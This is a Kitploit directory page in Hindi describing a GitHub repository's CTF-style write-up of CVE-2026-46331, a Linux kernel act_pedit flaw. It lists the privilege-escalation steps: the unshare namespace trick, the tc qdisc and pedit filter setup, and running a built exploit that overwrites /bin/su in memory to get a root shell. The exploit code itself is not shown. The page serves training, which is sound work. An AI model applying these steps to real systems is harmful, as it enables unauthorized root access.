Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-46331-pedit-cow — pedit COW भेद्यता (CVE-2026-46331) के लिए विवरण और शोषण के कदम | Kitploit
उपकरण/GitHubGitHub/marwahhadi/cve-2026-46331-pedit-cow
विशेषाधिकार वृद्धिशोषणCTFलर्निंग और शिक्षाबाइनरी शोषण
GitHubmarwahhadi/cve-2026-46331-pedit-cow

CVE-2026-46331-pedit-cow

pedit COW भेद्यता (CVE-2026-46331) के लिए विवरण और शोषण के कदम

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
52 महीने पहलेअभी तक समीक्षित नहीं

CVE-2026-46331-pedit-cow

pedit COW भेद्यता (CVE-2026-46331) के लिए विवरण और शोषण चरण।

अवलोकन

यह चुनौती pedit COW को प्रदर्शित करती है, जो ट्रैफ़िक-नियंत्रण उपतंत्र के पैकेट-संपादन क्रिया (act_pedit) में एक Linux कर्नेल दोष है। यह भेद्यता एक अनाधिकृत उपयोगकर्ता को setuid-root बाइनरी की मेमोरी में प्रतिलिपि को अधिलेखित करने की अनुमति देती है, जिससे वह डिस्क पर फ़ाइल को छुए बिना प्रभावी रूप से एक रूट शेल प्राप्त कर लेता है।

शोषण के चरण

1. प्रारंभिक सेटअप

वातावरण एक अनाधिकृत उपयोगकर्ता (karen) के रूप में शुरू होता है।

id
cd ~/packet_edit_meme
make packet_edit_meme
  1. विशेषाधिकार वृद्धि (नेमस्पेस निर्माण) ट्रैफ़िक-नियंत्रण को कॉन्फ़िगर करने के लिए सामान्यतः CAP_NET_ADMIN विशेषाधिकारों की आवश्यकता होती है, जो एक सामान्य उपयोगकर्ता के पास नहीं होते। मैंने यह क्षमता प्राप्त करने के लिए अनाधिकृत उपयोगकर्ता नेमस्पेस का उपयोग किया।
unshare -r -n
  1. ट्रैफ़िक-नियंत्रण क्रिया को कॉन्फ़िगर करना नेमस्पेस के अंदर, मैंने clsact qdisc को कॉन्फ़िगर किया और pedit क्रिया को ट्रिगर करने के लिए एक फ़िल्टर लागू किया।

यदि आवश्यक हो तो किसी भी मौजूदा कॉन्फ़िगरेशन को साफ़ करें

tc qdisc del dev lo clsact

qdisc और फ़िल्टर सेटअप करें

tc qdisc add dev lo clsact
tc filter add dev lo egress matchall action pedit ex munge ip ttl set 64
  1. एक्सप्लॉइट निष्पादित करना वातावरण सेट करने के बाद, मैंने रूट शेल से बाहर निकलकर एक अनाधिकृत उपयोगकर्ता के रूप में एक्सप्लॉइट निष्पादित किया।
exit
./packet_edit_meme
  1. अंतिम परिणाम एक्सप्लॉइट ने /bin/su की प्रविष्टि को सफलतापूर्वक अधिलेखित कर दिया, जिससे एक इंटरैक्टिव रूट शेल प्राप्त हुआ।
# cat /root/flag.txt

THM{YOUR_FLAG_HERE}

टूल डाउनलोड करें